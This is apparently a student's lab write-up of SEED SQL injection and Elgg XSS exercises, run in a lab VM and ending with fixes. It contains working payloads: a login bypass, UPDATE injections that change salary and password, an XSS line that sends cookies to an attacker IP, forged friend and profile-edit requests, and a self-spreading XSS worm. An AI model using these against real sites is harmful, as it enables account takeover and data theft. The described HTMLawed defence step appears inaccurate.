20211904 2021-2022-2 《网络攻防实践》第十次作业

1.实践内容

Web应用程序安全攻防

1.1 Sql注入简介
Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。由于sql语句本身的多样性,以及可用于构造sql语句的编程方法很多,因此凡是构造sql语句的步骤均存在被攻击的潜在风险。Sql注入的方式主要是直接将代码插入参数中,这些参数会被置入sql命令中加以执行。间接的攻击方式是将恶意代码插入字符串中,之后将这些字符串保存到数据库的数据表中或将其当成元数据。当将存储的字符串置入动态sql命令中时,恶意代码就将被执行。
1.2 sql注入方式
  1. 通过特殊的数据库查询语句

  2. 在数据库的错误返回中找到sql漏洞

  3. 利用sql语句猜解管理人员信息并登陆管理员后台

1.3 sql注入防范方式
  1. sql语句预处理

  1. 使用正则表达式过滤传入的参数

  2. 字符串过滤

1.4 xss攻击原理

xss攻击可以分成两种类型:

  1. 非持久型xss攻击

非持久型xss攻击是一次性的,仅对当次的页面访问产生影响。非持久型xss攻击要求用户访问一个被攻击者篡改后的链接,用户访问该链接时,被植入的攻击脚本 被用户游览器执行,从而达到攻击目的。
  1. 持久型xss攻击

持久型xss攻击会把攻击者的数据存储在服务器端,攻击行为将伴随着攻击数据一直存在。下面来看一个利用持久型xss攻击获取session id的实例。
1.5 xss防范方式
  1. 基于特征的防御

    XSS漏洞和著名的SQL注入漏洞一样,都是利用了Web页面的编写不完善,所以每一个漏洞所利用和针对的弱点都不尽相同。这就给XSS漏洞防御带来了困难:不可能以单一特征来概括所有XSS攻击。

    传统XSS防御多采用特征匹配方式,在所有提交的信息中都进行匹配检查。对于这种类型的XSS攻击,采用的模式匹配方法一般会需要对“javascript”这个关键字进行检索,一旦发现提交信息中包含“javascript”,就认定为XSS攻击。
  1. 基于代码修改的防御

    和SQL注入防御一样,XSS攻击也是利用了Web页面的编写疏忽,所以还有一种方法就是从Web应用开发的角度来避免:
    对所有用户提交内容进行可靠的输入验证,包括对URL、查询关键字、HTTP头、POST数据等,仅接受指定长度范围内、采用适当格式、采用所预期的字符的内容提交,对其他的一律过滤。
    实现Session标记(session tokens)、CAPTCHA系统或者HTTP引用头检查,以防功能被第三方网站所执行。
    确认接收的的内容被妥善的规范化,仅包含最小的、安全的Tag(没有javascript),去掉任何对远程内容的引用(尤其是样式表和javascript),使用HTTP only的cookie。

2.实践过程

2.1 SEED SQL注入攻击与防御实验

我们已经创建了一个Web应用程序,并将其托管在www.SEEDLabSQLInjection.com。该Web应用程序是一个简单的员工管理应用程序。员工可以通过此Web应用程序查看和更新数据库中的个人信息。此Web应用程序主要有两个角色:管理员是特权角色,可以管理每个员工的个人资料信息。员工是一般角色,可以查看或更新自己的个人资料信息。完成以下任务:

 

  • 熟悉SQL语句: 我们已经创建了一个名为Users的数据库,其中包含一个名为creditential的表。该表存储了每个员工的个人信息(例如,eid,密码,薪水,ssn等)。在此任务中,您需要使用数据库来熟悉SQL查询。

  • 对SELECT语句的SQL注入攻击:上述Web应用存在SQL输入漏洞,任务是在不知道密码的情况下登陆该Web应用程序。

  • 对UPDATE语句的SQL注入攻击:通过员工的更新个人界面实施UPDATE语句的SQL注入攻击。

  • SQL对抗:修复上述SQL注入攻击漏洞。


2.1.1 实验环境

本次实验使用的虚拟机是SEEDUbuntu

查看Apache Server是否开启:sudo systemctl status apache2

如果没有启动则使用:sudo service apache2 start

image-20220517094242107


2.1.2 熟悉SQL语句

首先通过指令:mysql -u root -pseedubuntu 登陆Mysql数据库[-u 指定用户名 -p密码]

image-20220517094830504

登录成功后在命令行输入 use Users; 切换到Users数据库 切换成功之后再输入show tables; 查看这个Users数据库下的表

不要忘记这两个指令后面的分号

image-20220517095337345

尝试使用select * from credential; 查询这个表里边所有的内容

image-20220517095607179

发现里面存储着员工的ID、Name、EID、Salary、birth、SSN、PhoneNumber、Address、Email、NickName、Password,ID、Name、EID、Salary、birth、SSN、Password是存有数据的

image-20220517100056293


2.1.3 对SELECT语句的SQL注入攻击

首先打开这个Web应用程序www.SEEDLabSQLInjection.com

image-20220517100356518

发现这是一个登录界面,尝试经典的用户名admin,密码12345,失败

image-20220517100454296

登录的过程中,捕获数据包,发现校验是通过unsafe_home.php 页面进行的

image-20220517100650536

image-20220517100857187

打开虚拟机上的目录 cd /var/www/ [存储动态变化的文件,如缓存文件,日志等],会发现unsafe_home.php

image-20220517102130437

查看这个文件可以知道登录的逻辑,通过name字段是否为Admin区分管理员身份和非管理员身份[在这里我们可以知道Admin肯定是name字段中存在的数据!],根据你输入的用户名和密码作为查询的条件,查到就展示数据,查不到就输出不存在此用户。

image-20220517102357208

image-20220517102411062

这里的查询语句为 "SELECT id, name, eid, salary, birth, ssn, phonenumber, address, email, nickname, Password FROM credential WHERE name='\$input_uname' and Password='\$hashed_pwd'"; 如果此时将input_uname 输入为 Admin'#,这样一来语句就变成 "SELECT id, name, eid, salary, birth, ssn, phonenumber, address, email, nickname, Password FROM credential WHERE name='Admin'# and Password='\$hashed_pwd'"; 后面Password的部分就会被注释掉,所以密码是什么已经不重要了

image-20220517103458029

回到页面重新输入用户名Admin'# 密码留空

image-20220517104031732

image-20220517104010803


2.1.3 对UPDATE语句的SQL注入攻击

登录成功之后会发现有个编辑选项,对应页面unsafe_edit_frontend.php [前端]

image-20220517110608770

image-20220517110838927

尝试修改数据

image-20220517111425880

发现保存修改时请求了页面unsafe_edit_backend.php [后端]

image-20220517111535106

打开虚拟机上的目录 cd /var/www/ [存储动态变化的文件,如缓存文件,日志等],会发现unsafe_edit_backend.php

打开文件,找到update语句

image-20220517125352123

同样可以利用与登录相同的方式,尝试修改某个员工的工资,这里以员工Ted为例

首先登录Ted

image-20220517125652357

image-20220517125701594

修改页面只提供修改PhoneNumber、Address、Email、NickName、Password字段,我们可以再次使用相同的方式修改我们知道的字段,例如工资、生日等

在NickName输入框输入 ', salary='20211904', birth='5/22' where EID = '50000';#

由于update sql语句的漏洞,我们可以在任何人的修改页面修改任何人的信息,只要知道name字段的数据

image-20220517132726553

image-20220517132746255

image-20220517133105732

image-20220517133127383

在代码里面我们可以知道,密码数据是经过sha1加密的

image-20220517133355194

所以我们也可以修改员工的密码

首先通过指令 echo -n '20211904wjh'|sha1sum 生成密码

image-20220517133602824

再修改员工的Ted密码为我们生成的密码

在NickName输入框输入 ', Password = '3092afe3fb9912d69c820003bdebe10ab78df01e' where Name = 'Ted';#

image-20220517135432013

使用20211904wjh作为密码可以登录员工Ted的信息页面

image-20220517135520360


2.1.4 SQL对抗

出现sql注入漏洞的根本原因是数据与字段绑定在一起,所以修复漏洞的办法就是分开数据和字段,先使用占位符占位,获取到数据之后再进行填充,就可以避免注入攻击

对于unsafe_home.php 页面

image-20220517135910895

此处的代码应修改为

$sql = $conn->prepare("SELECT id, name, eid, salary, birth, ssn, phoneNumber, address, email, nickname, Password From credential WHERE name= ? and Password=?;");
$sql->bind_param("ss",$input_uname,$hashed_pwd);

对于unsafe_edit_backend.php 页面

image-20220517140852718

此处的代码应该为

$sql = $conn->prepare("UPDATE credential SET nickname= ?,email= ?,address= ?,Password= ?,PhoneNumber= ? where ID=$id;");
$sql->bind_param("sssss",$input_nickname,$input_email,$input_address,$hashed_pwd,$input_phonenumber);}else{
$sql = $conn->prepare("UPDATE credential SET nickname= ?,email= ?,address= ?,PhoneNumber= ? where ID=$id;");
$sql->bind_param("ssss",$input_nickname,$input_email,$input_address,$input_phonenumber);
}

2.2 SEED XSS跨站脚本攻击实验(Elgg)

为了演示攻击者可以利用XSS漏洞做什么,我们在预先构建的Ubuntu VM映像中设置了一个名为Elgg的Web应用程序。在本实验中,学生需要利用此漏洞对经过修改的Elgg发起XSS攻击,攻击的最终目的是在用户之间传播XSS蠕虫,这样,无论是谁查看的受感染用户个人资料都将被感染。

  • 发布恶意消息,显示警报窗口:在您的Elgg配置文件中嵌入一个JavaScript程序,以便当另一个用户查看您的配置文件时,将执行JavaScript程序并显示一个警报窗口。

  • 弹窗显示cookie信息:将cookie信息显示。

  • 窃取受害者的cookies:将cookie发送给攻击者。

  • 成为受害者的朋友:使用js程序加受害者为朋友,无需受害者干预,使用相关的工具了解Elgg加好友的过程。

  • 修改受害者的信息:使用js程序使得受害者在访问Alice的页面时,资料无需干预却被修改。

  • 编写XSS蠕虫。

  • 对抗XSS攻击。

2.2.1 发布恶意消息,显示警报窗口

打开SEEDUbuntu自带的火狐浏览器,里面有XSS实验的网站

image-20220517141645256

使用用户名alice 密码seedalice 登录网站

image-20220517141918298

在个人主页这里点击 Edit profile

image-20220517142042680

Brief description处编辑一段JavaScript代码<script>alert("20211904")</script>,这段代码的作用就是弹出提示框

image-20220517142258941

保存之后确实弹出了提示框

image-20220517142504343


2.2.2 弹窗显示cookie信息

修改Brief description处的JavaScript代码为<script>alert(document.cookie)</script>

image-20220517142817106


2.2.3 窃取受害者的cookies

修改Brief description处的JavaScript代码为<script>document.write('<img src="图片链接"/>')</script> 可以实现展示图片,那么我们可以尝试将src设置为我们自己的某个端口,返回受害者的cookie进行窃取

JavaScript代码为<script>document.write('<img src=192.168.25.5:9897?cookie='+ document.cookie + '>')</script>

image-20220517152124417

成功获取到对方的cookie

image-20220517152035735


2.2.4 成为受害者的朋友

首先通过添加好友,抓取添加好友的网页数据包,可以看到添加好友需要的参数

image-20220517152417910

image-20220517152519908

参数有三个,分别是friend __elgg_token __elgg_ts

所以我们只要构造出这三个东西,就可以自动添加好友了

image-20220517152616194

通过编写如下代码,可以实现自动添加好友

<script type="text/javascript">
window.onload = function () {
var Ajax=null;
var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
var token="&__elgg_token="+elgg.security.token.__elgg_token;

//Construct the HTTP request to add Samy as a friend.
var sendurl="http://www.xsslabelgg.com/action/friends/add?friend=44" + ts + token;

//Create and send Ajax request to add friend
Ajax=new XMLHttpRequest();
Ajax.open("GET",sendurl,true);
Ajax.setRequestHeader("Host","www.xsslabelgg.com");
Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
Ajax.send();
}
</script>

将上面的代码放到alice的 About me 页面

image-20220517160220669

image-20220517153649078


2.2.5 修改受害者的信息

与上一个步骤一样,抓取修改简介的网页数据包,可以看到修改简介需要的参数

image-20220517154012183

image-20220517154053503

image-20220517154211070

根据参数编写相应的代码,实现修改好友简介

<script type="text/javascript">
window.onload = function(){
//JavaScript code to access user name, user guid, Time Stamp __elgg_ts
//and Security Token __elgg_token
var userName=elgg.session.user.name;
var guid="&guid="+elgg.session.user.guid;
var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
var token="&__elgg_token="+elgg.security.token.__elgg_token;

//Construct the content of your url.
var content= token + ts + "name=" + userName + "&description=<p>this had been changed by xss attack.</p> &accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;
var sendurl = "http://www.xsslabelgg.com/action/profile/edit"
alert(content)
//FILL IN
var samyGuid=44;
//FILL IN
if(elgg.session.user.guid!=samyGuid)
{
//Create and send Ajax request to modify profile
var Ajax=null;
Ajax=new XMLHttpRequest();
Ajax.open("POST",sendurl,true);
Ajax.setRequestHeader("Host","www.xsslabelgg.com");
Ajax.setRequestHeader("Content-Type",
"application/x-www-form-urlencoded");
Ajax.send(content);
}
}
</script>

将上面的代码放到alice的 About me 页面

image-20220517160233731

登录boby,点击alice的个人简介,发现boby的简介也变了

image-20220517155417174


2.2.6 编写XSS蠕虫

编写的代码如下

<script id="worm" type="text/javascript">
window.onload = function(){
var headerTag = "<script id=\'worm\' type=\'text/javascript\'>";
var jsCode = document.getElementById("worm").innerHTML;
var tailTag = "</" + "script>";
var wormCode = encodeURIComponent(headerTag + jsCode + tailTag);

var userName=elgg.session.user.name;
var guid="&guid="+elgg.session.user.guid;
var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
var token="&__elgg_token="+elgg.security.token.__elgg_token;

//Construct the content of your url.
var content= token + ts + "&name=" + userName + "&description=<p>this page had been changed by xss attack "+ wormCode + "</p> &accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;
var sendurl = "http://www.xsslabelgg.com/action/profile/edit"
alert(content)

var samyGuid=44;

if(elgg.session.user.guid!=samyGuid)
{
var Ajax=null;
Ajax=new XMLHttpRequest();
Ajax.open("POST",sendurl,true);
Ajax.setRequestHeader("Host","www.xsslabelgg.com");
Ajax.setRequestHeader("Content-Type",
"application/x-www-form-urlencoded");
Ajax.send(content);
}

}
</script>

还是放在alice的主页,再让boby去访问alice的主页,同样,boby简介被修改了

image-20220517160304371

尝试使用charlie访问boby,发现charlie的简介也被修改了

image-20220517160323182

2.2.7 对抗XSS攻击

登录Admin的账户 ,用户名Admin 密码seedelgg

登录成功后点击Administration

image-20220517160833400

点击Plugins

image-20220517160955132

关闭HTMLawed

image-20220517161022936

点击进入alice的简介,发现js代码出现了,并且没有感染导致简介被修改

image-20220517161219244


3.学习中遇到的问题及解决

  • 问题1:将代码粘贴到alice About me 页面攻击不生效

  • 问题1解决方式:要转换Edit HTML页面进行编辑并保存才能生效

 

4.实践总结

通过这次实验,我学到了简单的SQL注入原理,就是利用sql语句中的数据与字段结合的漏洞,实现注入攻击,这种攻击方式很巧妙,不过进行sql语句预处理就无法实现注入了。实践二XSS脚本展现了强大的攻击方式,让我体会到了web安全的难度,还有很多知识要学习!

 

参考资料

posted @ 2022-05-17 16:38  20211904  阅读(24)  评论(0编辑  收藏  举报